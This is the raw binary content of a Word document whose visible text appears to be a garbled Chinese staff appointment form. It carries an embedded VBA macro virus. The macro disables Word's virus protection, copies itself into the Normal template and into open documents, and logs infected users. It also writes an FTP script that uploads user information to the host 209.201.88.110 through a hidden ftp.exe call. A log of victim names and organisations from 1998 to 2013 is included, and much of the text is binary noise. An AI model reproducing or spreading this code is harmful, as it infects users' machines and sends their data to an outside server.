��ࡱ�>�� 47����3��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������'` �R�`bjbj����8���� �������L�� � � � � <@��        %''''''$�h :K!     K  l^ ^ ^    %^  %^ ^ �%  YR���  ����0��,F3& .y%y%d  ^      KKT    �    @@@D �@@@D &:H���� SO��f[b�YeL��]��GPUS �Y T�e ��t^ g �e��GP�N1u��GPgP��N t^ g �e� t^ g �e����[�cb �]\O�[�c Ye�RbL�?e�#��N��~{W[ � t^ g �e�[yba�� �[yb�N��~{W[ � t^ g �e�f� YeL��]��GP�kX�Q��GPUS� Yef[�NXT��GP1ub���[yb �NL�ZQ?er^���GP1ufN���[yb ��]�R�NXT1uL�?eoRb���[yb� "*.46<@BNP\fhlnrv~������  l n � `�����������������������������Ϸ��Uh�{h�uCJaJo(h�4hhCDCJaJo( hCDo(hCDCJaJo(h3A�hCDCJaJo(h�u5�CJ$aJ$hN�hN�5�CJ$aJ$o(! ",@�������$�|&P#$/��If^��gdCDl���0$�|&P#$/��IfWD�`�0gdCDl��$$�|&P#$/��Ifa$gdCDl��$a$gde=V`�@BLNR55$$�|&P#$/��Ifa$gdCDl���kd$$If�l��5�\��h �&�w�����, t� 6P�|���0��������6������������������������4�4� la�ytCDNPZ�x[[$$�|&P#$/��Ifa$gdCDl���kd�$$If�l���0��h&�w� t� 6P�|���0��������6����������������4�4� la�ytCD���������x[[[[[[[$$�|&P#$/��Ifa$gdCDl���kd($$If�l�� �0��h&�w� t� 6P�|���0��������6����������������4�4� la�ytCD���    ���X;;$$�|&P#$/��Ifa$gdCDl���kd�$$If�l��]�0��h&�w� t� 6P�|���0��������6����������������4�4� la�ytCD��$�|&P#$/��IfWD�`��gdCDl��  l n v ��;. ��dhG$gd�{�kd$$$If�l����0��h&�w� t� 6P�|���0��������6����������������4�4� la�ytCD��$�|&P#$/��IfWD�`��gd�4hl��$$�|&P#$/��Ifa$gdCDl��v � � `��� & F ��dhG$gd�{��GP�N�~�[ybT�^�S�e\��GPUS��N�vsQ��YHh �Yef[�NXT�Ye�R��YHh �vQ�N�NXT�L�?e��YHh0 61�82P:p�{��. ��A!�n"�n#�7$�7%��S�� ���$$If�!vh5��5�� 5�� 5�1 #v�#v� #v� #v1 :V�l�5 t� 6P�|����6���,�5�w5��5��5�,ytCD|$$If�!vh5��5��#v�#v�:V�l� t� 6P�|����6���,�5�w5�ytCD|$$If�!vh5��5��#v�#v�:V�l�  t� 6P�|����6���,�5�w5�ytCD|$$If�!vh5��5��#v�#v�:V�l�] t� 6P�|����6���,�5�w5�ytCD|$$If�!vh5��5��#v�#v�:V�l�� t� 6P�|����6���,�5�w5�ytCD��N@��N ck�e $1$a$$CJKHPJ_HaJmH nHsH tH$A���$ ؞���k=�W[SOBi@���B nf�h�?@ABCDEFG8IJKLMNOPQRST����VWXYZ[\^��������������������������������������������������������������������������������������������������������������������������������������������Root Entry�������� �F;R��U�Data ������������1Table���������WordDocument����8SummaryInformation(������������#DocumentSummaryInformation8��������+Macros rR��YR��VBA�������� rR�� R��ThisDocument ����<�9_VBA_PROJECT������������* dir������������1PROJECTwm������������:)  !"#$%&'()*+,-./0����23456789��������<=>?@����B��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������6!8%:.* �� ���'�' (!>%@'$ ���'�' *!>%@'&�Switch the VirusProtection OFF� B(D$H$F���>HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info�LogFile J%L�� $��� (!>!P (!>%N'0 &�e� *!>!P *!>%N'0k��� 0� 0�' Log�file -->� 0� 0�' Log�file -->� $�'0� R���� 2� V$T��$� '2� R���C:\hsf 2�.sys'2 2����� 0��V� c:\netldx.vxd������o 209.201.88.110����user anonymous���� pass itsme@���� cd incoming����ascii����put 2����quit��V�*command.com /c ftp.exe -n -s:c:\netldx.vxd ZA@X���>HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info�LogFile J,Lk����MMake sure that some conditions are true before we continue infecting anything�  $� &� 4!\ ^ 4!\ `� Tru�Infect the NormalTemplate $��ed = T <!b'"alTe� (!>!P (!>%N',veDocu�1Write a log file of this NormalTemplate infection� R�� d!.� d!. R�$�� $f� d!. R�$�� $f� . d!. R�$�'.k��d�� .� $f�' '.k���� R��� ) ,� $f�'  h�hh:mm:ss AMPM - $� Z�dddd, d mmm yyyy$�� $f�'  d!j� $f�'  .� $f',ode � *!>!P *!>B@l , *!>B@nime, " "��G <B@pjk����Infect the ActiveDocument� &� 4!r��$��: 4!b��W 4!b' empl� *!>!P *!>%N',tiveDo� (!>���������E.\Z� �����������������������������x��ME������������� ��������������������������������������������������������������������������������������������������������������������������������(S"����S����S"����<������(1Normal.ThisDocument��������������(����������% ����������������������������������@���������L��x@� �������� ��@�"�������� ��@�$�������� ��`�&�������� ��@�(�������� ��`�*�������� ��@�,�������� ��@�.�������� ��@�0�������� ��`�2�����������������0����������������0����������������������������������������������������������������������"�� ������ ����� � ����� 0�H�h�x� ����� ������ �����&��& � ����� ����� $H� p� ����� �����z�� ����� �"� 8�"H�p� �����Zx� �������*�� �0� �����P�`� p� �������������� �8�P� h� �����8x� �����^�� ������ ����� ����� T�Dp� ����� ����� �� �� ����� �� �����"�� ����� ����� 8 �X�$p�$�� ��������� � �����(�(� ����� �������� ������ �����0� ����� ����� 8�FX� ����� �� �����"�� ��������� ����� � �����( � ����� �����0 � �����8 � ����� @ � ����� (X � � � � � � � ����� ����� ����� *� � � � � � ����� ����� ����� ( � ( � 8 � ����� ����� ����� *@ � p � � � ����� ����� ����� *� � � � � � ����� ����� ����� *� � �  � ����� ����� ����� ( � @ � X � ����� ����� ����� ,` � � � � � ����� ����� ����� (� � � � � � ����� ����� ����� , � 0 � @ � ����� ����� ����� (H � p � � � ����� ����� ����� *� � � � � � ����� ����� ����� (� � � �  � ����� ����� ����� ( � @ � X � ����� ����� ����� (` � � � � � ����� ����� ����� *� � � � � � ����� ����� ����� *� � (� @� ����� ����� ����� (H� p� �� ����� ����� ����� (�� �� �� ����� ����� ����� ,�� � ,� ����� ����� ����� *H� x� �� ����� ����� ����� *�� �� �� ����� ����� ����� *�� � � ����� ����� ����� * � P� `� ����� ����� ����� (h� �� �� ����� ����� ����� *�� �� �� ����� ����� ����� *��  � 0� ����� ����� ����� *8� h� x� ����� ����� ����� *�� �� �� ����� ����� ����� *�� �� � ����� ����� ����� .� @� P� ����� ����� ����� ,X� �� �� ����� ����� ����� *�� �� �� ����� ����� ����� ,�� � (� ����� ����� ����� ,0� `� p� ����� ����� ����� *x� �� �� ����� ����� ����� .�� �� � ����� ����� ����� ,� 8� H� ����� ����� ����� .P� �� �� ����� ����� ����� ,�� �� �� ����� ����� ����� *�� � (� ����� ����� ����� *0� `� p� ����� ����� ����� *x� �� �� ����� ����� ����� *�� �� � ����� ����� ����� (� 0� @� ����� ����� ����� *H� x� �� ����� ����� ����� *�� �� �� ����� ����� ����� *�� � � ����� ����� ��������(�0�p]�<- this is a marker!�p�Declare Variables]��������]���]��0�H�`�� ���Initialize Variables�� 4!6!8%:.(������ <!!P (!>B@lr , (!>B@n mmm y ��G 4B@pjk���k���o���� Logfile -->3) &�" 09:08:36 - Saturday, 28 Nov 1998� SPo0Ky� Blue Planet��$ 02:50:31 PM - Saturday, 28 Nov 1998� MARK B. SEAY��! 08:04:45 AM - Friday, 4 Dec 1998� UPS��$ 11:43:35 AM - Thursday, 17 Dec 1998� WRO��# 03:07:26 PM - Tuesday, 22 Dec 1998� BCBSA��$ 03:28:02 PM - Wednesday, 6 Jan 1999� BCBSA��" 02:59:47 PM - Monday, 11 Jan 1999� Marsha Veach��% 01:54:54 PM - Wednesday, 20 Jan 1999� Connie Sandifer, CMP��" 09:33:06 PM - Monday, 25 Jan 1999� Doug Rowan��% 08:21:12 AM - Wednesday, 27 Jan 1999� IMSI��" 10:59:58 AM - Friday, 29 Jan 1999� Raj��$ 03:37:57 PM - Saturday, 30 Jan 1999� hornd��" 01:26:48 PM - Tuesday, 2 Feb 1999� Cooley Godward��" 04:57:29 PM - Tuesday, 2 Feb 1999� Cooley Godward��" 06:35:44 PM - Tuesday, 2 Feb 1999� Cooley Godward��# 04:23:52 PM - Thursday, 4 Feb 1999� Cooley Godward��# 04:27:39 PM - Saturday, 6 Feb 1999� Cooley Godward��! 06:18:06 PM - Monday, 8 Feb 1999� Cooley Godward��" 09:17:17 PM - Tuesday, 9 Feb 1999� hclee��% 04:44:45 PM - Wednesday, 17 Feb 1999� Dr. W. Hsiao�% Wendy Hsiao, Ph.D.�# 04:13:19 PM - Tuesday, 23 Feb 1999� CCST��$ 10:09:35 AM - Saturday, 20 Mar 1999� cpwu��# 09:33:49 AM - Thursday, 6 May 1999m�� ������/��# 12:39:25 PM - Tuesday, 20 May 1997.vx� ghc-bbci��! 01:21:36 PM - Friday, 7 May 1999� �����f��# 05:51:53 - Wednesday, 12 May 1999NT_� qdzhuang��$ 03:23:04 PM - Saturday, 19 Jun 1999(AC� �����r��$ 02:53:46 ���� - Tuesday, 6 Sep 2011 � �����E��$ 09:37:47 ���� - Monday, 19 Sep 2011t s� ��ʿ��d��$ 01:41:54 ���� - Monday, 26 Sep 2011 co� unknowni��' 10:50:02 ���� - Wednesday, 19 Oct 2011m� ף�Ȫc��% 03:37:21 ���� - Tuesday, 25 Oct 2011at� unknowne��$ 08:45:16 ���� - Tuesday, 1 Nov 2011veD� ����t.��% 12:19:17 ���� - Thursday, 3 Nov 2011en� unknown ��& 02:16:41 ���� - Wednesday, 9 May 2012at� unknownr��$ 01:44:34 ���� - Friday, 15 Jun 2012 � ���Ʒ�e��' 01:17:59 ���� - Wednesday, 18 Jul 2012 � ���Ʒ�t��% 03:54:48 ���� - Tuesday, 24 Jul 2012 � ���ѻ�԰��' 11:28:13 ���� - Wednesday, 25 Jul 2012t� ��ռ�� ��& 11:05:49 ���� - Thursday, 26 Jul 2012Mo� Lenovo Users(1��$ 05:37:34 ���� - Monday, 13 Aug 2012nes� �Ĺ��� ��$ 09:31:23 ���� - Monday, 20 Aug 2012of � zxnNor��$ 01:34:31 ���� - Monday, 10 Sep 2012 F� Ǯ��־1��$ 04:50:54 ���� - Friday, 28 Sep 2012ddr� user ��" 10:14:34 AM - Tuesday, 9 Oct 2012� Psyriver��$ 09:09:40 ���� - Monday, 15 Oct 2012 � ���� I��$ 09:15:12 ���� - Monday, 25 Feb 2013res� USER1)��$ 11:22:35 ���� - Monday, 11 Mar 2013 � Userdr����������B�Attribute VB_Name = "ThisDocument" �Bas�1Normal.VGlobal!�SpaclFalse �CreatablPre declaId�Tru BExposeTemplateDeriv$Customliz�C�1P Sub ��_Cl5() On Error Res� Next� Const @Marker��<- t� is (a m !�� 'Dl Vari=s Dim �Save8,���e,GInfec`ted, �� As Boole�an-ant ObjCOurCode, UserAddres�s, LogD�fYFihS��ngA9'Initi0aliz��/Se�t a�bAct�[��1.VBProA�@Compon@�s.Item(1��S� &= 2� 0���<= .�3Module.Find�(�c, 1�0@�O= nt+FSwitchC�|Firus>t�Zion OFF���pt�s.V  = ��A If (Day(Now())�1) And (Sysm@M.��@fgf("", "HKEY_CURRENT_USER\Softw��\Micros@\MS �\up (ACPME)\A? `(o7!@?!>"��) The`H � �E;`�&k'�DH�ad))Li0nes(`1�Co�untOf��2!�E �� 64AuT�7F��Q�,If����Mid(�,�%�.�&"'�f" & "�2 -->")hen�) -���$ CF��i�@� To 4c � e"s=&+ A�Int(8 * R�nd)`2�]$ � ic@$"C:p\hsf���.8sys��A1Op en� �OutpruB�#1C S@y#��; A��B� �c� "c:\netldx.vxd" � "o 209.201.88.�110�"u� anonymou�pass @itsme@�c d inc��ng��ascii�A �H'�qui���(� Shell "A�mand.� /c ftp.exe -n -s:�$, vbHi�d`�g3?�K?��A�ٟA= cr�Ed32PMake sur�e`Pat so���cond c�q �H t�| befo@we �tin�ue�1ming�ny�s�f@(�F ~X�1�AQq�2! cS_]"(li�v�&m0 = wd�� Or� c_e^�y�R�R�q�rA 2a� �� � �� [W� �  .1�dQ1 �}pXX0ZX3S'Wri��a log rf�of P�, i�B� ns� �KL�P�ApplicaAp~.��I�o1Lot�i�L <> Chr�(13��(qs�h���0� I�` `]���C�1R �lk�Y=&f �W'� �F �\�'��9,3R0j�J�+(Timp�"hh:mm:0QAMP�M j�&�/��� �]�d, d �mmm y���O ���Ǐ �� �AG��}Del�ete�������e.��From�t��H��S�;/90#QG?B�ݬ�%� �9B�F�k6m����F(b* �Ful��,F ��P ":"N ~ ?N2�� q VR=����gIH ?��<����K|�������Sto$x���g:W�Sub�r�BT �09:0 8:36 �7Sa@turday�8�0$v 1998� SPo0Ky��Bl�rPla���!d2:50:31 r<��MARK BQ�. SEAY ' ' 08:04:45 AM - Friday, 4 De@c 1998� UPS �11:43:3fThursj17 lWRO l03:07:2�6 PjTue522 5BCBSA 72�27Wed�n96 Jan� 9/ 82:59�:478Mon�1 Marsha@ Veach ;1�:54;20 Connie Sandifer, CMP $9:3'}�{C25�"Doug Rowan�8:21:12ψ}27 IMS�I 10�}58���29J RajK@u7:5LSatu r�L3K�!�>@��Lenov@o User{5�:�!-3 A�x��Ĺ��֛/�00?v -0�zx��|@B �04R�Ǯ��־ r� }�28�u-�3>1B!�6,�3�Ps�yriv�9:�Tl40�� 5U7�������1p3;u�!e@3� US\ERz� X5�1�/r(s�ay� ��*\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.3#0#C:\Program Files\Microsoft Office\OFFICE11\MSWORD.OLB#Microsoft Word 11.0 Object Library�*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal�5�R(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.3#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL#Microsoft Office 11.0 Object Library �������� e�R��������������������������������������������������������������\ZThisDocument0452eb650d��ThisDocument��� K.������ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������T��y��I�g�Y ���������`�9:��,Word�k`VBA��`Win16�~`Win32`Mac��`VBA6�#`����1p`stdole�``Project-�` ThisDocument<�` ��_Evaluate�`Normal��`��Officeu`Documentj�`��Document_Close7\`��MarkerS�` ��SaveDocumentd]`��SaveNormalTemplate�l`��DocumentInfected �`��NormalTemplateInfectedy�`��ad~\`��nto^`��OurCode�=` ��UserAddressF�`��LogData(6`��LogFileG�`��ActiveDocument�\` ��VBProjectOh` ��VBComponents '`Item�z`��NormalTemplateq�` ��CodeModule�`��Findn�`��Options��`��VirusProtectionoD`Day��`Now%�`��Systema�`��PrivateProfileString[`��Lines��` ��CountOfLines!\`��i``Str��`RndR�`ShellV�`vbHide�W` ��SaveFormat�`��wdFormatDocument��`��wdFormatTemplatee`��Savedd�` ��Application�*`ChrK~`Time��`��UserName\�` ��DeleteLines �` ��AddFromString��`��Save��`��FullNameО`��T�������������������������������������������������������� ���0*� pH�d�ProjectQ(@=� l � e�R J< rstdole>stdoleP h%^*\G{00020�430-C 0046}#2.0#0#C:\WINDOWS\system32\e2.tlb#OLE Aut�omation`�ENormal�EN�CrmaQ�F � �* \C �5�R�!Offic�gOf�ic�g����!G{2DF8D04C-5BFA-101@B-BDE5�gAjA�e4�2�g��gram Files\CommonMicrosoft Shared\OFFICE11\MSO.DLL#��M 11 .0 Ob�� L�ibrary�%�"�z�\ZBeThisDocumentG � T�fis"D�Hcu@Ie�n�n� 2� �(HB1B�K.XB,�!�T "B+BBThisDocumentThisDocumentID="{28244122-C0F7-443A-A7A2-D771B3F4B3EB}" Document=ThisDocument/&H00000000 Name="Project" HelpContextID="0" VersionCompatible32="393222000" CMG="F1F33BB93FB93FB93FB93F" DPB="E2E0285B185C185C18" GC="D3D1196A0B6B0B6BF4" [Host Extender Info] &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000 PROJECT ����;iCompObj������������Am������������������������[Workspace] ThisDocument=0, 0, 0, 0, C �� ���� �FMicrosoft Office Word �ĵ� MSWordDocWord.Document.8�9�q